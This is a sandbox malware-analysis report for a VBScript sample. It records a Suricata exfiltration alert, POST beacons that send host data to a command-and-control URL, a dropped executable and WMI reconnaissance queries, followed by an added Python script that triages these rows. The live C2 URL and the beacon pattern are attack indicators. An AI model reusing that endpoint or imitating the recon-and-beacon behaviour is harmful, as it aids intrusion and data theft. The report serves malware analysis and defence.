Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x3201 | June 8, 2021, 4:36 p.m. | June 8, 2021, 4:38 p.m. |
Process | Command line | PID |
---|---|---|
wscript.exe | "C:\Windows\System32\wscript.exe" C:\Users\ADMINI~1\AppData\Local\Temp\dootakim.vbs | 2916 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49608 -> 185.176.43.98:80 | 2027117 | ET HUNTING Suspicious POST with Common Windows Process Names - Possible Process List Exfiltration | A Network Trojan was detected |
Suricata TLS
No Suricata TLS
Signature | Data |
---|---|
suspicious_features | POST method with no referer header |
suspicious_request | POST http://alyssalove.getenjoyment.net/0423/v.php?ki87ujhy=%ProgramFiles(x86)%&rdxvdw=C:\Program%20Files |
Type | Value |
---|---|
request | GET http://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD%2BOyl%2B0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEGxZ76nhAOEO4wa6j%2BApJVk%3D |
request | GET http://evcs-ocsp.ws.symantec.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQckPwgwK2Thdm9JYVwXQ4ERz3XDQQUo47PGUI9MeGrIYmEbcvZeaKysloCEFDtZ0JVYUv07T7UI8yTyn0%3D |
request | GET http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl |
request | GET http://s2.symcb.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD%2BOyl%2B0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCED141%2Fl2SWCyYX308B7Khio%3D |
request | GET http://sv.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQe6LNDJdqx%2BJOp7hVgTeaGFJ%2FCQgQUljtT8Hkzl699g%2B8uK8zKt4YecmYCEBLwJ34PIzs5%2BUGbBujN41I%3D |
request | GET http://sv.symcb.com/sv.crl |
request | GET http://crl.verisign.com/pca3.crl |
request | GET http://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ%2FxkCfyHfJr7GQ6M658NRZ4SHo%2FAQUCPVR6Pv%2BPT1kNnxoz1t4qN%2B5xTcCECcNdVyfWsO322H1CZgocHg%3D |
request | GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D |
request | GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAx5qUSwjBGVIJJhX%2BJrHYM%3D |
request | GET http://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ%2FxkCfyHfJr7GQ6M658NRZ4SHo%2FAQUCPVR6Pv%2BPT1kNnxoz1t4qN%2B5xTcCEDA2ePYtKPWPCdFq3RW5wHE%3D |
request | GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEA3etT%2BVczf76vmMSmFbFJ0%3D |
request | GET http://sv.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQe6LNDJdqx%2BJOp7hVgTeaGFJ%2FCQgQUljtT8Hkzl699g%2B8uK8zKt4YecmYCEADzAwdvBip42MYbURaknTY%3D |
request | GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D |
request | GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D |
request | POST http://alyssalove.getenjoyment.net/0423/v.php?ki87ujhy=%ProgramFiles(x86)%&rdxvdw=C:\Program%20Files |
request | POST http://alyssalove.getenjoyment.net/0423/v.php?ki87ujhy=%ProgramFiles(x86)%&rdxvdw=C:\Program%20Files |
file | C:\Users\Administrator\AppData\Roaming\gi.exe |
file | C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\OnlyStopWatch_x64.zip.lnk |
file | C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Media Player.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\test_eml.mht.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\네트워크 및 인터넷.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\agent.pyw.lnk |
file | C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\agent.py.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\한글2007.lnk |
file | C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer (2).lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\모든 제어판 항목.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\agent.lnk |
file | C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Chrome.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\로컬 디스크 (C).lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\프로그램.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\모양 및 개인 설정.lnk |
file | C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Firefox.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\사용자 계정 및 가족 보호.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\test.eml.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\policies.json.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\age.pyw.lnk |
file | C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Start Tor Browser.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\Python27.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\office_2007.lnk |
file | C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer (2).lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\알림 영역 아이콘.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\다운로드.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\sn.txt.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\시스템 및 보안.lnk |
wmi | Select Name, Version from Win32_Product Where Name Like 'Microsoft .NET Framework%' |
wmi | Select * from Win32_Process |
wmi | Select * from Win32_OperatingSystem |
wmi | Select * from Win32_Service WHERE state = "Running" |
file | C:\Users\Administrator\AppData\Roaming\gi.exe |
wmi | Select * from Win32_Service WHERE state = "Running" |
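The request and wmi rows above are the parts of this report worth triaging by hand: the OCSP and CRL fetches are the noise Windows produces when it validates an Authenticode or TLS certificate chain, while the two POSTs to alyssalove.getenjoyment.net carry host fingerprint data in the query string (the first value is the literal string %ProgramFiles(x86)%, sent unexpanded, the second is the decoded path C:\Program Files) and the four WMI queries enumerate products, processes, OS and running services before the beacon. The script below is an added example, not part of the sandbox report or its tooling; it parses rows in this report's flattened `kind | value |` layout and applies exactly that separation. The allow-list of CA hosts and the column names in the result are assumptions for the example; the sample rows are copied verbatim from the report, abridged to one representative set.

```python
"""Triage helper for flattened sandbox summary rows (added example).

Splits HTTP requests into certificate-revocation checks (expected when
Windows validates a code-signing or TLS chain) versus POST beacons whose
parameters leak host configuration, and lists the WMI classes queried.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# OCSP responders / CRL distribution points of public CAs seen in the report.
# Assumption for this example: GETs to these hosts are chain validation, not C2.
CA_HOSTS = {
    "ocsp.verisign.com", "crl.verisign.com", "crl.microsoft.com",
    "evcs-ocsp.ws.symantec.com", "s2.symcb.com", "sv.symcb.com",
    "sv.symcd.com", "ocsp.digicert.com",
}

ROW_RE = re.compile(r"^(?P<kind>\w+)\s*\|\s*(?P<value>.+?)\s*\|?\s*$")
ENV_PLACEHOLDER_RE = re.compile(r"^%[\w()]+%$")   # e.g. %ProgramFiles(x86)% sent unexpanded
WIN_PATH_RE = re.compile(r"^[A-Za-z]:\\")         # e.g. C:\Program Files
WMI_CLASS_RE = re.compile(r"\bfrom\s+(Win32_\w+)", re.IGNORECASE)

# Rows copied from the report above (abridged); the trailing pipe is part of the layout.
SAMPLE_ROWS = r"""
request | GET http://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD%2BOyl%2B0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEGxZ76nhAOEO4wa6j%2BApJVk%3D |
request | GET http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl |
request | GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D |
request | POST http://alyssalove.getenjoyment.net/0423/v.php?ki87ujhy=%ProgramFiles(x86)%&rdxvdw=C:\Program%20Files |
request | POST http://alyssalove.getenjoyment.net/0423/v.php?ki87ujhy=%ProgramFiles(x86)%&rdxvdw=C:\Program%20Files |
wmi | Select Name, Version from Win32_Product Where Name Like 'Microsoft .NET Framework%' |
wmi | Select * from Win32_Process |
wmi | Select * from Win32_OperatingSystem |
wmi | Select * from Win32_Service WHERE state = "Running" |
"""


def parse_rows(text):
    """Return (kind, value) pairs for every line in the flattened layout."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            rows.append((m["kind"], m["value"]))
    return rows


def fingerprint_params(query):
    """Query parameters whose values leak host configuration, with a reason."""
    leaks = []
    for key, val in parse_qsl(query, keep_blank_values=True):
        if ENV_PLACEHOLDER_RE.match(val):
            leaks.append((key, val, "unexpanded environment variable"))
        elif WIN_PATH_RE.match(val):
            leaks.append((key, val, "local filesystem path"))
    return leaks


def triage(text):
    """Classify request rows and collect WMI reconnaissance classes."""
    cert_checks = 0
    posts = Counter()          # (host, path, query) -> number of beacons
    other = []
    wmi_classes = set()
    for kind, value in parse_rows(text):
        if kind == "request":
            method, _, url = value.partition(" ")
            u = urlsplit(url)
            if method == "GET" and u.hostname in CA_HOSTS:
                cert_checks += 1
            elif method == "POST":
                posts[(u.hostname, u.path, u.query)] += 1
            else:
                other.append(value)
        elif kind == "wmi":
            wmi_classes.update(WMI_CLASS_RE.findall(value))
    c2_posts = [
        {"host": host, "path": path, "count": n, "leaks": fingerprint_params(query)}
        for (host, path, query), n in posts.items()
    ]
    return {
        "cert_checks": cert_checks,
        "c2_posts": c2_posts,
        "other_requests": other,
        "wmi_recon": sorted(wmi_classes),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_ROWS)
    print(f"certificate revocation checks: {result['cert_checks']}")
    for post in result["c2_posts"]:
        print(f"POST beacon to {post['host']}{post['path']} x{post['count']}")
        for key, val, why in post["leaks"]:
            print(f"  {key}={val!r}  ({why})")
    print("WMI recon:", ", ".join(result["wmi_recon"]))
```

Keying the POST counter on host, path and query is deliberate: a repeated identical POST (two here) is a beacon retry or check-in, which is worth reporting as a count rather than as two separate findings, and the query string is kept raw so the unexpanded `%...%` placeholder survives for the analyst to see.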